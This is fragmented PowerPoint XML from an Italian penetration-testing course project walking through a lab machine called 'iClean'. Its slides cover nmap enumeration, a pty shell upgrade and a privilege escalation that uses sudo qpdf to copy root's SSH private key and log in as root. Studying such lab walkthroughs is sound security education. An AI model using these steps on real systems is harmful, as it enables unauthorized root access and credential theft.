        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{3FA37803-21F2-4EA5-BB14-24AB9C9B4F2D}" srcId="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" destId="{04B90381-F658-435D-80EE-2F4718D07F7D}" srcOrd="1" destOrd="0" parTransId="{B6EB2663-26A5-47B4-8F04-7D8CA12CD8A9}" sibTransId="{9D9248CC-CDFD-43DB-B44F-E2F1B4060938}"/>
    <dgm:cxn modelId="{05DE6F06-8443-4107-B450-EE5B1E182C8F}" type="presOf" srcId="{87D2EC3B-5DA6-4094-B2B4-210292F36A5D}" destId="{F79871BE-CA8F-46A8-8A44-5862028ED8D3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{5CBEFD32-FDB0-4D0F-A076-4B3C18254EC8}" type="presOf" srcId="{29B8AAE2-736C-4391-8EFD-072326A630B4}" destId="{3FBEEB7D-BB87-4604-B197-5B91C8B39AD8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{4E8E6C39-814C-42D5-BC46-08CF62B54245}" srcId="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" destId="{29B8AAE2-736C-4391-8EFD-072326A630B4}" srcOrd="2" destOrd="0" parTransId="{A1E3B11E-E699-4837-B848-5B695295F1B3}" sibTransId="{9310BD89-3CFF-4380-A577-C134BF381DCD}"/>
    <dgm:cxn modelId="{C4C87060-3F44-4426-948C-ED79430D9625}" type="presOf" srcId="{04B90381-F658-435D-80EE-2F4718D07F7D}" destId="{05957E71-A88E-4CE6-B370-6C64F1C2BFAA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{FEC16B6C-CE5A-460C-80FA-FE50FA1D19CF}" type="presOf" srcId="{87D2EC3B-5DA6-4094-B2B4-210292F36A5D}" destId="{B1CC3612-0E17-4A18-A5FF-0B57F2C11F08}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{76E3426E-B976-4FD5-8C0D-AB2AA85C4844}" srcId="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" destId="{87D2EC3B-5DA6-4094-B2B4-210292F36A5D}" srcOrd="0" destOrd="0" parTransId="{DE77E2DD-A83B-495E-B9B1-82B3564718EA}" sibTransId="{B48856CA-3723-4074-8FBD-9392545D8410}"/>
    <dgm:cxn modelId="{175D1684-570B-4BCF-BB1B-EAF0BBB0391C}" type="presOf" srcId="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" destId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{103E9287-352E-499B-B813-2EF55382581F}" type="presOf" srcId="{B48856CA-3723-4074-8FBD-9392545D8410}" destId="{CD93190D-0C23-4013-AE13-1195EE43B3E9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{3E35B49F-3A8A-462D-96CF-B7DED3DC57BD}" type="presOf" srcId="{29B8AAE2-736C-4391-8EFD-072326A630B4}" destId="{718CA4E2-B800-49CB-BA55-C039ED1A4979}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{3CE2FAAB-388D-4E28-B775-9CA43F96BDFD}" type="presOf" srcId="{04B90381-F658-435D-80EE-2F4718D07F7D}" destId="{5380FF30-BF3A-468A-AF95-7085180E8FFC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1CDD75FB-FAFC-429B-842C-5C5EB2874BEA}" type="presOf" srcId="{9D9248CC-CDFD-43DB-B44F-E2F1B4060938}" destId="{34ECCA4E-7730-4A92-B775-6B5F749E619A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{61B3BD8C-9273-432C-90C0-757017DF6F26}" type="presParOf" srcId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" destId="{30ECD8EB-7CB3-45DD-B3D3-3B3F6F037AA8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{C6911DDE-17C7-4DFA-AB65-5DBFA2DB4F4A}" type="presParOf" srcId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" destId="{F79871BE-CA8F-46A8-8A44-5862028ED8D3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{84E5EBC5-4EED-48AA-B6B6-11FF1D20A84F}" type="presParOf" srcId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" destId="{05957E71-A88E-4CE6-B370-6C64F1C2BFAA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{E799835C-5473-4A2F-BC0C-C18FE611C211}" type="presParOf" srcId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" destId="{718CA4E2-B800-49CB-BA55-C039ED1A4979}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{8CDDC009-58FA-4226-A784-CB01661B3C0F}" type="presParOf" srcId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" destId="{CD93190D-0C23-4013-AE13-1195EE43B3E9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{E97F7A1F-78F2-41E6-B610-2A3F865F62DD}" type="presParOf" srcId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" destId="{34ECCA4E-7730-4A92-B775-6B5F749E619A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{586C11E6-57B5-418C-91A6-3824BD9D76A4}" type="presParOf" srcId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" destId="{B1CC3612-0E17-4A18-A5FF-0B57F2C11F08}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{B9DEB526-5235-41A0-86F8-3EAE673BA106}" type="presParOf" srcId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" destId="{5380FF30-BF3A-468A-AF95-7085180E8FFC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{F3547A8F-E0EB-4980-A8A8-BC2CD748DAD6}" type="presParOf" srcId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" destId="{3FBEEB7D-BB87-4604-B197-5B91C8B39AD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F6743-31BB-4B81-B9D9-443F7A7C98AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="806" y="0"/>
          <a:ext cx="3266894" cy="35644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697" tIns="0" rIns="322697" bIns="330200" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT" sz="1900" kern="1200"/>
            <a:t>Ora siamo entrati come utente “www-data”.  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="806" y="1425774"/>
        <a:ext cx="3266894" cy="2138661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB2FAAEB-A4BE-4A8D-BDB9-78C9EEBE966E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="806" y="0"/>
          <a:ext cx="3266894" cy="142577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97" tIns="165100" rIns="32269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6" y="0"/>
        <a:ext cx="3266894" cy="1425774"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{392A494B-2E8F-4BE1-A8F7-B05CD0EE9333}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3529052" y="0"/>
          <a:ext cx="3266894" cy="35644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697" tIns="0" rIns="322697" bIns="330200" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT" sz="1900" kern="1200"/>
            <a:t>Per renderci la vita più agiata possiamo utilizzare il seguente comando per passare da sh a bash: </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3529052" y="1425774"/>
        <a:ext cx="3266894" cy="2138661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD54ABE-C593-4B99-ADF4-D0ED154A7D3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3529052" y="0"/>
          <a:ext cx="3266894" cy="142577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97" tIns="165100" rIns="32269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29052" y="0"/>
        <a:ext cx="3266894" cy="1425774"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F535595C-62D5-4872-B690-EAF1D8EA7CE7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7057298" y="0"/>
          <a:ext cx="3266894" cy="356443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697" tIns="0" rIns="322697" bIns="330200" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT" sz="1900" kern="1200"/>
            <a:t>python3 -c 'import pty; pty.spawn("/bin/bash")' </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7057298" y="1425774"/>
        <a:ext cx="3266894" cy="2138661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{43997D5B-B9A0-4DCE-A3FB-C29D686F1B51}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7057298" y="0"/>
          <a:ext cx="3266894" cy="142577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97" tIns="165100" rIns="32269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57298" y="0"/>
        <a:ext cx="3266894" cy="1425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871BE-CA8F-46A8-8A44-5862028ED8D3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="5847589" cy="17919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Il comando qpdf è il seguente: </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="52485" y="52485"/>
        <a:ext cx="3913915" cy="1686999"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{05957E71-A88E-4CE6-B370-6C64F1C2BFAA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="515963" y="2090630"/>
          <a:ext cx="5847589" cy="1791969"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="771019"/>
            <a:satOff val="2386"/>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sudo /usr/bin/qpdf --empty /tmp/rsa.txt --qdf --add-attachment /root/.ssh/id_rsa -- </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="568448" y="2143115"/>
        <a:ext cx="4061875" cy="1686999"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{718CA4E2-B800-49CB-BA55-C039ED1A4979}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1031927" y="4181261"/>
          <a:ext cx="5847589" cy="1791969"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="1542039"/>
            <a:satOff val="477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In quanto consuela, creata la copia del file /root/.ssh/id_rsa non ci resta altro che stamparlo a schermo, usarlo e connetterci alla macchina target come utenri root. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1084412" y="4233746"/>
        <a:ext cx="4061875" cy="1686999"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CD93190D-0C23-4013-AE13-1195EE43B3E9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4682809" y="1358909"/>
          <a:ext cx="1164779" cy="116477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44884" y="1358909"/>
        <a:ext cx="640629" cy="876496"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{34ECCA4E-7730-4A92-B775-6B5F749E619A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5198773" y="3437593"/>
          <a:ext cx="1164779" cy="1164779"/>
        </a:xfrm>
        <a:prstGeom prst="downArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 55000"/>
            <a:gd name="adj2" fmla="val 45000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="1346614"/>
            <a:satOff val="3365"/>
            <a:lumOff val="-275"/>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460848" y="3437593"/>
        <a:ext cx="640629" cy="87649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1332813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210013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159619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407048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240362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59332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6/6/2024</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112167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1757514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3258301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236640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6/6/2024</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‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274117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6/6/2024</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‹N›</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9299078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ordlists.assetnote.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rackstation.net/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.revshells.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.urlencoder.io/"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revshells.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75" name="Group 174">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9CF3400-712B-4A54-AA97-63691A14E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 y="-1"/>
            <a:ext cx="12214827" cy="6858000"/>
            <a:chOff x="-6214" y="-1"/>
            <a:chExt cx="12214827" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="176" name="Straight Connector 175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BCC43BE-B496-4A5B-AAD7-F0F69BA21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97DD0A7-99B5-40E1-ABCA-BE535E775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CAF3513-E2DC-42F1-8F00-949F16CED2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685A4E-43E1-4ED0-93B0-8D4402783F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DC413A5-A523-40CC-96D3-ED63C394DB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43D25610-0173-44F0-AFFE-7427F1F29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7925567-A2D3-4F52-B7E9-56C436EE3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167520C-8F3F-4CAE-A7ED-30476E6E17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F43F498-AF93-41DF-89CA-D19BCE8F68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C21741E-506D-459F-AA12-6CE9F15CD9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030791B-E6A0-471E-8709-0D8F9D2384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D3F242F-79B7-4749-976F-A27C7D31FA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BE4F727-1ED6-4E04-B586-E058744B6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994E2EC-2763-4131-9BD3-92C2AE1725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73677D4-BFB6-47AF-8722-0A8D71E74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6A10715-F501-41F3-B1B7-E097A52633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2495331-9452-449E-8AB8-F0355F3CD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88DD0C0-9E46-4E4E-ABC4-F908B3E0D9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2E254AC-141E-46F7-86E8-0E74127859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A20FC2D-6D9D-4AF1-9728-A9FB3CEE4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F7E34D7-D4B0-403A-9AD2-714897B87C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C8BCEBA-2A4E-4177-A332-1DC5E76EF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B7B350A-903A-412A-8F4B-F0BCA602E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F2E75DC-BD54-41F1-9947-AFAED44FA6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DE1290C-F8A4-48B6-BBD6-1D93D25B13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AFE6EDC-0C88-4664-A186-CA6B82E4C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B281018-B505-45E1-B063-EA8474C8C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9104272-C096-4761-B915-A9D4B3881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CA26F8B-B3D2-4B34-8966-03EA36D13C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9C68CA5-A882-4E90-AEA3-134C7A539D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118A2B1-DA3F-4896-BF6A-9958C5BCB3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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696606" y="3969770"/>
            <a:ext cx="5411688" cy="2159776"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>iClean</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Sottotitolo 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6604414" y="3969771"/>
            <a:ext cx="4582567" cy="2209868"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" err="1"/>
              <a:t>Attività</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" err="1"/>
              <a:t>progettuale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Corso si Penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Hetical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Hacking</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Antonio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Allocca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> 0522501527</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene cartone animato, vestiti, persona, Cartoni animati&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2D816C-4E32-B5C1-0B78-306E78C400E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="8180" r="3" b="21009"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1903" y="-7"/>
            <a:ext cx="6077804" cy="3604514"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6077804" h="3604514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6077804" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6077804" y="3321937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5516914" y="3420963"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4259631" y="3624720"/>
                  <a:pt x="2876619" y="3710676"/>
                  <a:pt x="550645" y="3402391"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="3324581"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, schermata, Elementi grafici, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2049FF95-5EA3-53D8-1EB4-E26393B1DA0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="9031" r="1" b="22126"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6079707" y="12"/>
            <a:ext cx="6107918" cy="3321937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6107918" h="3321937">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6107918" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6107918" y="2630869"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3060680" y="2630869"/>
                  <a:pt x="1537061" y="3032227"/>
                  <a:pt x="13442" y="3319564"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="3321937"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Right Triangle 207">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D507CED1-3C18-429E-A877-80F9779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4228853"/>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258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ECD52CD1-DA7F-E431-5A06-3A0AEE3052BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691079" y="725951"/>
            <a:ext cx="4927425" cy="1938525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4100" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4100">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="4100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Right Triangle 4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egnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3162DC9E-263D-BA77-8F2E-A371C61249ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691079" y="2886116"/>
            <a:ext cx="4927425" cy="3245931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Possiamo inoltre elencare tutte le vulnerabilità sempre usando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> tramite lo script "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Formule matematiche complesse su una lavagna">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB3B6DB-16E7-699D-3A9E-2686E0C10C46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="12529" r="24797" b="-6"/>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004547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A813FD93-4BAF-D156-C7C4-8B049378F974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691078" y="722903"/>
